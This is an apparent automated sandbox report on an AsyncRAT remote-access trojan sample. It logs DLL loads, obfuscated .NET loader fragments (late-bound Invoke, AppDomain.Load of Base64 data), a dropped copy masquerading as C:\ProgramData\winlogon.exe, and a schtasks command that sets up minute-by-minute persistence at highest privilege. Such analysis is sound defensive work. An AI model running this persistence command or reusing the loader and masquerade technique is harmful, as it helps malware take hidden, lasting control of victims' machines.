              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
              Source: C:\ProgramData\winlogon.exeSection loaded: mscoree.dll
              Source: C:\ProgramData\winlogon.exeSection loaded: apphelp.dll
              Source: C:\ProgramData\winlogon.exeSection loaded: kernel.appcore.dll
              Source: C:\ProgramData\winlogon.exeSection loaded: version.dll
              Source: C:\ProgramData\winlogon.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\ProgramData\winlogon.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\ProgramData\winlogon.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\ProgramData\winlogon.exeSection loaded: uxtheme.dll
              Source: C:\ProgramData\winlogon.exeSection loaded: sspicli.dll
              Source: C:\ProgramData\winlogon.exeSection loaded: cryptsp.dll
              Source: C:\ProgramData\winlogon.exeSection loaded: rsaenh.dll
              Source: C:\ProgramData\winlogon.exeSection loaded: cryptbase.dll
              Source: C:\ProgramData\winlogon.exeSection loaded: mscoree.dll
              Source: C:\ProgramData\winlogon.exeSection loaded: kernel.appcore.dll
              Source: C:\ProgramData\winlogon.exeSection loaded: version.dll
              Source: C:\ProgramData\winlogon.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\ProgramData\winlogon.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\ProgramData\winlogon.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\ProgramData\winlogon.exeSection loaded: uxtheme.dll
              Source: C:\ProgramData\winlogon.exeSection loaded: sspicli.dll
              Source: C:\ProgramData\winlogon.exeSection loaded: cryptsp.dll
              Source: C:\ProgramData\winlogon.exeSection loaded: rsaenh.dll
              Source: C:\ProgramData\winlogon.exeSection loaded: cryptbase.dll
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5E5F29CE-E0A8-49D3-AF32-7A7BDC173478}\InProcServer32Jump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: 1bE8S5sN9S.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
              Source: 1bE8S5sN9S.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

              Data Obfuscation

              barindex
              .NET source code contains method to dynamically call methods (often used by packers)
              Source: 1bE8S5sN9S.exe, BjcTwoDwK7Te.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{x9bkUzIMu7sa._0A8b2vfxAZzr,x9bkUzIMu7sa.uOyYXmnxsQPj,x9bkUzIMu7sa.u3ACJ2wJCDDw,x9bkUzIMu7sa.zV18Zr4XioYd,mRl85ZGdeGKjVMwWWch6JAuMl9qbSM2xNpQ2hfPL4avkXPmtoRwpBRXACjb0l5234SKTKoxkFEcdOX0pKE5sjLY.hlLZXZehjIJpL8Iu4zPO4R8GKaIrP7CskEwpg3EHFR4cNBNyEBSUi2tEE3PYqfCLWiLICjSlgpm6dDAl63HKX3g()}}, (string[])null, (Type[])null, (bool[])null, true)
              Source: 1bE8S5sN9S.exe, BjcTwoDwK7Te.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{sbQ5gGTdmvil[2],mRl85ZGdeGKjVMwWWch6JAuMl9qbSM2xNpQ2hfPL4avkXPmtoRwpBRXACjb0l5234SKTKoxkFEcdOX0pKE5sjLY.epJ4UorIKnkVxsjGc3BSRd8ZJx8tFhIZwqZl62wVanVZ0d2yx3Gd9Z2BEJRGTf1pMsUEATpcrLplQETV4hXjT1R(Convert.FromBase64String(sbQ5gGTdmvil[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
              Source: winlogon.exe.0.dr, BjcTwoDwK7Te.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{x9bkUzIMu7sa._0A8b2vfxAZzr,x9bkUzIMu7sa.uOyYXmnxsQPj,x9bkUzIMu7sa.u3ACJ2wJCDDw,x9bkUzIMu7sa.zV18Zr4XioYd,mRl85ZGdeGKjVMwWWch6JAuMl9qbSM2xNpQ2hfPL4avkXPmtoRwpBRXACjb0l5234SKTKoxkFEcdOX0pKE5sjLY.hlLZXZehjIJpL8Iu4zPO4R8GKaIrP7CskEwpg3EHFR4cNBNyEBSUi2tEE3PYqfCLWiLICjSlgpm6dDAl63HKX3g()}}, (string[])null, (Type[])null, (bool[])null, true)
              Source: winlogon.exe.0.dr, BjcTwoDwK7Te.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{sbQ5gGTdmvil[2],mRl85ZGdeGKjVMwWWch6JAuMl9qbSM2xNpQ2hfPL4avkXPmtoRwpBRXACjb0l5234SKTKoxkFEcdOX0pKE5sjLY.epJ4UorIKnkVxsjGc3BSRd8ZJx8tFhIZwqZl62wVanVZ0d2yx3Gd9Z2BEJRGTf1pMsUEATpcrLplQETV4hXjT1R(Convert.FromBase64String(sbQ5gGTdmvil[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
              .NET source code contains potential unpacker
              Source: 1bE8S5sN9S.exe, BjcTwoDwK7Te.cs.Net Code: JTOZmlukSenD System.AppDomain.Load(byte[])
              Source: 1bE8S5sN9S.exe, BjcTwoDwK7Te.cs.Net Code: mbFkdINJVCsT System.AppDomain.Load(byte[])
              Source: 1bE8S5sN9S.exe, BjcTwoDwK7Te.cs.Net Code: mbFkdINJVCsT
              Source: winlogon.exe.0.dr, BjcTwoDwK7Te.cs.Net Code: JTOZmlukSenD System.AppDomain.Load(byte[])
              Source: winlogon.exe.0.dr, BjcTwoDwK7Te.cs.Net Code: mbFkdINJVCsT System.AppDomain.Load(byte[])
              Source: winlogon.exe.0.dr, BjcTwoDwK7Te.cs.Net Code: mbFkdINJVCsT
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeCode function: 0_2_00007FF848E600BD pushad ; iretd 0_2_00007FF848E600C1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848D6D2A5 pushad ; iretd 2_2_00007FF848D6D2A6
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848F52316 push 8B485F92h; iretd 2_2_00007FF848F5231B
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF848D4D2A5 pushad ; iretd 5_2_00007FF848D4D2A6
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF848E600BD pushad ; iretd 5_2_00007FF848E600C1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF848F32316 push 8B485F94h; iretd 5_2_00007FF848F3231B
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF848F3797D pushad ; iretd 5_2_00007FF848F37A09
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FF848D5D2A5 pushad ; iretd 8_2_00007FF848D5D2A6
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FF848E700BD pushad ; iretd 8_2_00007FF848E700C1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FF848F42316 push 8B485F93h; iretd 8_2_00007FF848F4231B
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FF848F49B7A push D000009Bh; retf 8_2_00007FF848F49BC1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FF848D7D2A5 pushad ; iretd 11_2_00007FF848D7D2A6
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FF848F60017 pushad ; iretd 11_2_00007FF848F60039
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FF848F62316 push 8B485F91h; iretd 11_2_00007FF848F6231B
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FF848F6797D pushad ; ret 11_2_00007FF848F67A09
              Source: 1bE8S5sN9S.exe, huvcs0bN3whZNSyvbdAPwB5i0SdIu.csHigh entropy of concatenated method names: 'Wz4wtNsF82DIijzafmxufBd4QcVlP', '_8lSO5zCrWkrkUPndRIz39c76EQB1y', 'uL8XkGghei9T3M5gkWDuClKFcXAwV', '_4k6fOHFKRAcP9uFgUgcBCKYFZuHFAB6XpbnZbm5tovVkbV5', 'tCm2aMAAYWnIUTJANkI7PoY2s052JmrMWVyN5c7q5fDmeXa', 'Wv7nEQsRKFnoaPnHOVkzBNnE5OPrwdUA79VEqKvLwg0kTXZ', 'M5ohqLf9rro9lRP2NkJsAZmbehGu8GCJ3Sktdj2JblA8MIn', '_7NtKWgXlnc9e2XNMfEV2qUMQ20ODYi03rQsMQSh8ryhNgF2', 'p97GuDDQMSGFVGypwMMDSfCQyfI19uulftTmxzsCGtniwhA', 'WnDmQpIoPOmbo8blprtYUDZJzzc4J03NCnWWXZV0sXkfjIN'
              Source: 1bE8S5sN9S.exe, KkC8m6bEtyr7.csHigh entropy of concatenated method names: 'BikQkpIk5Mlm', '_8qAUYWL69AHK', '_7eTCmK6m4AjR', '_5lYws0qmRDuB', 'g8XmmVG6AE8B', 'auPpfY1o5hal', 'kgkXUD1TEVM7', 'AfFTnOyOtoE6', '_0cTiJAPIJwO6', 'QjddZ6g66Qye'
              Source: 1bE8S5sN9S.exe, widT2inyDa3d.csHigh entropy of concatenated method names: '_4Dkzh2fjCl5r', 'hvewyx9iiAMv', '_8XkU9Dn2Jrzs', 'aumNhYGgyg5K', 'AwQKdmwOO5ftBaB', 'F7H2sLbj4ml44Vr', 'fJvTZhzhII2TkPi', 'WjBypbGmEmXOGc9', 'NpT4aRUrqCFUSmH', 'EysJ9ogJa1T7ADF'
              Source: 1bE8S5sN9S.exe, CgQb5JRuPMCF.csHigh entropy of concatenated method names: 'aIsjBBajcnHt', 'kbEufO4nXMoK', 'YOjE9dOP2Mn9', 'UNK6sRuWUQ1o', 'JrwQo9f321yI', 'lheFdV4hPimw', 'hTmijnsgUykt', '_7KuML8jAB6Rz', 'okExfIJxwtQd', 'h9IqAGL3AIE0'
              Source: 1bE8S5sN9S.exe, CwopOrYYP7IE.csHigh entropy of concatenated method names: '_22xWs7qbaiZ8', 'soVMV1E3xNPo', 'ae4MGtR1Yvhi', '_2u7UNm7tihtW', 'qu0m267pGpEm', 'HxZYKY68LpnN', 'v58Qee6D9gzL', 'lctu4iRoyJav8S5', 'HEq6mGoMLq5Ydjq', 'TrWlpW854Ur6tOH'
              Source: 1bE8S5sN9S.exe, 5IfOgMKI6gLH.csHigh entropy of concatenated method names: 'wEBRnHXTyktT', 'M703CQ8IDxYb', 'uyntvGY4fKY13Mc', 'UZbdaw2So3W4RmN', 'gGiQJXrBfrFWUOg', 'luSYn5QMNoxeY2v'
              Source: 1bE8S5sN9S.exe, mRl85ZGdeGKjVMwWWch6JAuMl9qbSM2xNpQ2hfPL4avkXPmtoRwpBRXACjb0l5234SKTKoxkFEcdOX0pKE5sjLY.csHigh entropy of concatenated method names: 'NtSggsmL4V6DVNDXO0U0tptqD6MfJ9dAJV0GuxdtJay1OBfbKtzZGfJxkc4jefxcKwl9YQFsUJ5jNMhlyrcg3fR', 'r4s3S1w1V5u26s21bIuf1YXVhMRdLZPhwN1wxGZTRu8GcyOatO1NkaqrcOHJnmj8I14DzOIiA22VUahsfo5ZT59', 'QOmhRQsiRHgPW4PF52VHIy1Nkj5IOWNde3RFekCKVLFig7Yozb0OsA8GESJ0mn8gMVJQElmMUfDYah2Tww1lM6P', 'QsC8RCrSrrzpIbET10fdDsYYg9VRh3dHaSGmLF0kfEgT4QsBSt9wFKLEA0fz0yjdwfdtZOIbIV0L6U5WyKWEekV', 'cMjMZf9SnnoWFEDawz8ImQNKKk6rgX0SVq4hYlvCTcyjTdmevTNIXQtQ2Nq7kowoCvEnK6lQw18OukMLhyuDDgH', 'wqMmA5iWy8XqD5YJhB46WDNNPia7q1DqQfOO3WaLotEcUJNYeSf36bPaS5kBUrOcDylCdDZWXoKXYwhIeQTZQ4z', 'AakRSKEczs2ZUqkewo1ICsJZtpJMnjQCq6QmAntVNwCv9X3llZSCThEtU7AwPSyERqLnM2hVHQQfI0S1HL0qEvf', 'TpSHg2BPcas661QXjfk7eHX7XlyV7q4aBWIEaWV1wlbkl36TiAwCj2l9vnueXIw3D1MeY9IDzHcYqFjzeUrr6jG', 'MMqGOKBKRKyWWf6OE9smddPjULTirsTr8MIyalfzX4TpfBRoFJVjL5GvLpMPX8sxz2k3fikregJ5Noq96YRaXm9', 'r8H3hXNUPndlUpixvehma4dAW6cnzkqlvK6pgLcCGnxB81ZTfOnQzTuDL0nPMom3XEFeXMV2xSf8ktR7t6n1iFm'
              Source: 1bE8S5sN9S.exe, BjcTwoDwK7Te.csHigh entropy of concatenated method names: 'pMhVtvZieFOR', 'JTOZmlukSenD', 'HPBsm1lwhyrf', 'He63eM05cLXu', 'YGxSnQJcoztO', 'ZkoyVkQ1oY8p', 'OCtpjztbn2Cm', 'PJP2pWnVCn6x', 'CzDjLrSB1N75', 'QplAiizn75Zq'
              Source: winlogon.exe.0.dr, huvcs0bN3whZNSyvbdAPwB5i0SdIu.csHigh entropy of concatenated method names: 'Wz4wtNsF82DIijzafmxufBd4QcVlP', '_8lSO5zCrWkrkUPndRIz39c76EQB1y', 'uL8XkGghei9T3M5gkWDuClKFcXAwV', '_4k6fOHFKRAcP9uFgUgcBCKYFZuHFAB6XpbnZbm5tovVkbV5', 'tCm2aMAAYWnIUTJANkI7PoY2s052JmrMWVyN5c7q5fDmeXa', 'Wv7nEQsRKFnoaPnHOVkzBNnE5OPrwdUA79VEqKvLwg0kTXZ', 'M5ohqLf9rro9lRP2NkJsAZmbehGu8GCJ3Sktdj2JblA8MIn', '_7NtKWgXlnc9e2XNMfEV2qUMQ20ODYi03rQsMQSh8ryhNgF2', 'p97GuDDQMSGFVGypwMMDSfCQyfI19uulftTmxzsCGtniwhA', 'WnDmQpIoPOmbo8blprtYUDZJzzc4J03NCnWWXZV0sXkfjIN'
              Source: winlogon.exe.0.dr, KkC8m6bEtyr7.csHigh entropy of concatenated method names: 'BikQkpIk5Mlm', '_8qAUYWL69AHK', '_7eTCmK6m4AjR', '_5lYws0qmRDuB', 'g8XmmVG6AE8B', 'auPpfY1o5hal', 'kgkXUD1TEVM7', 'AfFTnOyOtoE6', '_0cTiJAPIJwO6', 'QjddZ6g66Qye'
              Source: winlogon.exe.0.dr, widT2inyDa3d.csHigh entropy of concatenated method names: '_4Dkzh2fjCl5r', 'hvewyx9iiAMv', '_8XkU9Dn2Jrzs', 'aumNhYGgyg5K', 'AwQKdmwOO5ftBaB', 'F7H2sLbj4ml44Vr', 'fJvTZhzhII2TkPi', 'WjBypbGmEmXOGc9', 'NpT4aRUrqCFUSmH', 'EysJ9ogJa1T7ADF'
              Source: winlogon.exe.0.dr, CgQb5JRuPMCF.csHigh entropy of concatenated method names: 'aIsjBBajcnHt', 'kbEufO4nXMoK', 'YOjE9dOP2Mn9', 'UNK6sRuWUQ1o', 'JrwQo9f321yI', 'lheFdV4hPimw', 'hTmijnsgUykt', '_7KuML8jAB6Rz', 'okExfIJxwtQd', 'h9IqAGL3AIE0'
              Source: winlogon.exe.0.dr, CwopOrYYP7IE.csHigh entropy of concatenated method names: '_22xWs7qbaiZ8', 'soVMV1E3xNPo', 'ae4MGtR1Yvhi', '_2u7UNm7tihtW', 'qu0m267pGpEm', 'HxZYKY68LpnN', 'v58Qee6D9gzL', 'lctu4iRoyJav8S5', 'HEq6mGoMLq5Ydjq', 'TrWlpW854Ur6tOH'
              Source: winlogon.exe.0.dr, 5IfOgMKI6gLH.csHigh entropy of concatenated method names: 'wEBRnHXTyktT', 'M703CQ8IDxYb', 'uyntvGY4fKY13Mc', 'UZbdaw2So3W4RmN', 'gGiQJXrBfrFWUOg', 'luSYn5QMNoxeY2v'
              Source: winlogon.exe.0.dr, mRl85ZGdeGKjVMwWWch6JAuMl9qbSM2xNpQ2hfPL4avkXPmtoRwpBRXACjb0l5234SKTKoxkFEcdOX0pKE5sjLY.csHigh entropy of concatenated method names: 'NtSggsmL4V6DVNDXO0U0tptqD6MfJ9dAJV0GuxdtJay1OBfbKtzZGfJxkc4jefxcKwl9YQFsUJ5jNMhlyrcg3fR', 'r4s3S1w1V5u26s21bIuf1YXVhMRdLZPhwN1wxGZTRu8GcyOatO1NkaqrcOHJnmj8I14DzOIiA22VUahsfo5ZT59', 'QOmhRQsiRHgPW4PF52VHIy1Nkj5IOWNde3RFekCKVLFig7Yozb0OsA8GESJ0mn8gMVJQElmMUfDYah2Tww1lM6P', 'QsC8RCrSrrzpIbET10fdDsYYg9VRh3dHaSGmLF0kfEgT4QsBSt9wFKLEA0fz0yjdwfdtZOIbIV0L6U5WyKWEekV', 'cMjMZf9SnnoWFEDawz8ImQNKKk6rgX0SVq4hYlvCTcyjTdmevTNIXQtQ2Nq7kowoCvEnK6lQw18OukMLhyuDDgH', 'wqMmA5iWy8XqD5YJhB46WDNNPia7q1DqQfOO3WaLotEcUJNYeSf36bPaS5kBUrOcDylCdDZWXoKXYwhIeQTZQ4z', 'AakRSKEczs2ZUqkewo1ICsJZtpJMnjQCq6QmAntVNwCv9X3llZSCThEtU7AwPSyERqLnM2hVHQQfI0S1HL0qEvf', 'TpSHg2BPcas661QXjfk7eHX7XlyV7q4aBWIEaWV1wlbkl36TiAwCj2l9vnueXIw3D1MeY9IDzHcYqFjzeUrr6jG', 'MMqGOKBKRKyWWf6OE9smddPjULTirsTr8MIyalfzX4TpfBRoFJVjL5GvLpMPX8sxz2k3fikregJ5Noq96YRaXm9', 'r8H3hXNUPndlUpixvehma4dAW6cnzkqlvK6pgLcCGnxB81ZTfOnQzTuDL0nPMom3XEFeXMV2xSf8ktR7t6n1iFm'
              Source: winlogon.exe.0.dr, BjcTwoDwK7Te.csHigh entropy of concatenated method names: 'pMhVtvZieFOR', 'JTOZmlukSenD', 'HPBsm1lwhyrf', 'He63eM05cLXu', 'YGxSnQJcoztO', 'ZkoyVkQ1oY8p', 'OCtpjztbn2Cm', 'PJP2pWnVCn6x', 'CzDjLrSB1N75', 'QplAiizn75Zq'
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeFile created: C:\ProgramData\winlogon.exeJump to dropped file
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeFile created: C:\ProgramData\winlogon.exeJump to dropped file

              Boot Survival

              barindex
              Yara detected AsyncRAT
              Source: Yara matchFile source: Process Memory Space: 1bE8S5sN9S.exe PID: 5580, type: MEMORYSTR
              Uses schtasks.exe or at.exe to add and modify task schedules
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "winlogon" /tr "C:\ProgramData\winlogon.exe"

              Hooking and other Techniques for Hiding and Protection

              barindex
              Loading BitLocker PowerShell Module
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\1bE8S5sN9S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
